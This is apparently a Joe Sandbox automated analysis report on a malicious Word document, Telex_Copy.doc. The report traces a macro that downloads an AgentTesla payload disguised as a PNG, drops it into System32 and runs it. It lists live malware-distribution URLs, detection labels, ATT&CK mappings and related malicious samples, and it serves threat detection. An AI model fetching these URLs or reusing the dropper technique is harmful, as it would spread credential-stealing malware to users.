Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Windows\System32\TelexCopy.png	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Windows\System32\TelexCopy.png	Memory allocated: 77740000 page execute and read and write			Jump to behavior

Source: TelexCopy[1].png.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TelexCopy.png.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Telex_Copy.doc	ReversingLabs: Detection: 37%
Source: Telex_Copy.doc	Virustotal: Detection: 63%

Source: C:\Windows\System32\TelexCopy.png

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\TelexCopy.png TelexCopy.png
Source: C:\Windows\System32\TelexCopy.png	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=968,1692114121093780899,121391818690164613,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1404 /prefetch:8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\TelexCopy.png TelexCopy.png	Jump to behavior
Source: C:\Windows\System32\TelexCopy.png	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=968,1692114121093780899,121391818690164613,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1404 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\TelexCopy.png

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Telex_Copy.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Telex_Copy.doc

Source: Telex_Copy.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$lex_Copy.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9DF.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.expl.evad.winDOC@31/10@7/7

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Telex_Copy.doc	OLE document summary: title field not present or empty
Source: Telex_Copy.doc	OLE document summary: edited time not present or 0
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: TelexCopy[1].png.0.dr, PrinReport.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: TelexCopy.png.0.dr, PrinReport.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.TelexCopy.png.c30000.0.unpack, PrinReport.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: TelexCopy[1].png.0.dr, RelationPerson.cs	.Net Code: strange System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: TelexCopy.png.0.dr, RelationPerson.cs	.Net Code: strange System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.TelexCopy.png.c30000.0.unpack, RelationPerson.cs	.Net Code: strange System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: initial sample	Static PE information: section name: .text entropy: 7.766772067809108
Source: initial sample	Static PE information: section name: .text entropy: 7.766772067809108

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Executable created and started: C:\Windows\System32\TelexCopy.png

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Windows\System32\TelexCopy.png			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Windows\System32\TelexCopy.png			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Windows\System32\TelexCopy.png

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\TelexCopy.png	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\TelexCopy.png

Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	42 Scripting	Path Interception	11 Process Injection	131 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	42 Scripting	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Telex_Copy.doc	38%	ReversingLabs	Script.Trojan.Woreflint
Telex_Copy.doc	63%	Virustotal		Browse
Telex_Copy.doc	100%	Avira	VBA/Dldr.Agent.gppkc
Telex_Copy.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\System32\TelexCopy.png	100%	Avira	HEUR/AGEN.1308640
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	100%	Avira	HEUR/AGEN.1308640
C:\Windows\System32\TelexCopy.png	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	54%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Windows\System32\TelexCopy.png	54%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Source	Detection	Scanner	Label	Link
http://topvaluationfirms.com/TelexCopy.png	100%	Avira URL Cloud	phishing
http://topvaluationfirms.com/TelexCop	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
adobetarget.data.adobedc.net	66.235.152.107	true	false	unknown
accounts.google.com	142.250.203.109	true	false	high
part-0032.t-0009.fdv2-t-msedge.net	13.107.237.60	true	false	unknown
dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com	34.241.45.41	true	false	high
clients.l.google.com	142.250.203.110	true	false	high
topvaluationfirms.com	188.114.96.7	true	true	unknown
js.monitor.azure.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high
microsoftmscompoc.tt.omtrdc.net	unknown	unknown	false	unknown
mdec.nelreports.net	unknown	unknown	false	unknown
mscom.demdex.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	false		high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc	false		high
http://topvaluationfirms.com/TelexCopy.png	true	Avira URL Cloud: phishing	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://topvaluationfirms.com/TelexCop	Telex_Copy.doc	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.203.110	clients.l.google.com	United States	15169	GOOGLEUS	false
188.114.96.7	topvaluationfirms.com	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
34.241.45.41	dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
13.107.237.60	part-0032.t-0009.fdv2-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.203.109	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	879269
Start date and time:	2023-05-31 17:07:28 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Telex_Copy.doc
Detection:	MAL
Classification:	mal100.expl.evad.winDOC@31/10@7/7
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
Excluded IPs from analysis (whitelisted): 95.100.53.90, 142.250.203.99, 2.19.68.254, 34.104.35.123, 216.58.215.234, 172.217.168.10, 172.217.168.42, 172.217.168.74, 142.250.203.106, 20.42.65.89, 2.21.22.152, 2.21.22.184, 52.182.143.210
Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, target.microsoft.com, content-autofill.googleapis.com, clientservices.googleapis.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, browser.events.data.trafficmanager.net, learn.microsoft.com, firstparty-azurefd-prod.trafficmanager.net, e11290.dspg.akamaiedge.net, aijscdn2.azureedge.net, mdec.nelreports.net.akamaized.net, browser.events.data.microsoft.com, go.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, a1883.dscd.akamai.net, go.microsoft.com.edgekey.net, learn.microsoft.com.edgekey.net, update.googleapis.com, onedscolprdeus11.eastus.cloudapp.azure.com, www.gstatic.com, onedscolprdcus10.centralus.cloudapp.azure.com, wcpstatic.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.7	http://k1e4hf.vqyys.ellisfence.com	Get hash	malicious	Unknown	Browse	cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=cpanelwhmreferral
	P.S.P_PO231237.doc	Get hash	malicious	Unknown	Browse	topvaluationfirms.com/jahah.png
	TRT432537.2023.624430.673564.26748.lNk.lnk	Get hash	malicious	Unknown	Browse	gkw3emaait2.magnetismoalfa.online/?1/
	PO29-09123.doc	Get hash	malicious	Unknown	Browse	topvaluationfirms.com/kkraken.png
	B6gXqbOxy7.exe	Get hash	malicious	Nymaim	Browse	str.skymiddle.host/track_inl2.php?poid=2525&p=1.25
	602QN20427-1.exe	Get hash	malicious	FormBook	Browse	www.bankloan-dd.ru/ce18/?GN94X=YfGfYqnQ0E8QYHlGrXTd+VHS94LruUT5EVdGVS9KasiXvUKCoBxGNu3xNUCH9lw/4WH4wyWxWQ==&l83HTP=kTPH2jqh3t5XF67P
	M7R70022.exe	Get hash	malicious	Djvu, SmokeLoader	Browse	potunulit.org/
	P5348574_74676.exe	Get hash	malicious	FormBook	Browse	www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&UZCu=zJfEuRXw-P
	Product7825.exe	Get hash	malicious	FormBook	Browse	www.antalyabfe.com/bpg5/
	rSW-Purchase_or.exe	Get hash	malicious	AveMaria	Browse	filetransfer.io/data-package/ha2xNxET/download
	73011.exe	Get hash	malicious	FormBook	Browse	www.giftoin.com/c6si/?-Zf=Oo6LJbacBpxi+rwmOKSATAy/vfYGhdYPpEbFutLaIuReOCHyvcmTfAH+I47HD0mD55HxfkN+JQ==&a8=fFNH
	http://ww5.mangakakalot.tv	Get hash	malicious	Porn Scam	Browse	ww5.mangakakalot.tv/
	PO-13228.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.buyautoworld.com/mr04/?hvOPZd9x=XCmWOmpovSMjmDgytOP6lkg0xvWyXFIu92txl2xV5zM9LiF6cgkwaNqOSYnbZjI2sRwx&3fut_=3fHhzf
	Order_Inquiry..exe	Get hash	malicious	FormBook	Browse	www.jetgiris.live/ks01/?F0GXGJO=iux4edQ47uCMuCiF3NhIsBvR6ztriMx9pHHkx+2+UhzEA5G7XXJNs6mgRyXVGmvzYSdA/SoFZA==&Zb=4hR8GJu8dX
	32332577.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Stealc, Vidar	Browse	potunulit.org/
	renderer292.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader, Stealc	Browse	potunulit.org/
	Quotation-pdf-.exe	Get hash	malicious	FormBook	Browse	www.awath.dev/ae30/?1bV8J=KklPFRL4VYlhPnzbEJAQC6+qujDeEolP00CY9vjVijktWKARIvQVdSmYAJ4r2SyhLzgw&zDK=2dcT2xlX_
	http://onedrive.kinhdown.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	onedrive.kinhdown.workers.dev/?sso_reload=true
	RV099278372-0288.exe	Get hash	malicious	FormBook	Browse	www.doordelivery.life/km37/?6lsp=Jhm+LR3XUoQcDMrnoqyHPw2PgLttsUQKp12LcykwRkfgpNu/zL9muXpcHMsPdSB4h7AX&TTkDfH=PtxHOl6pHFZ
	ZiraatBankasiSwiftMesaji15052023.exe	Get hash	malicious	FormBook	Browse	www.pornorusskoe.best/p6es/

Domains

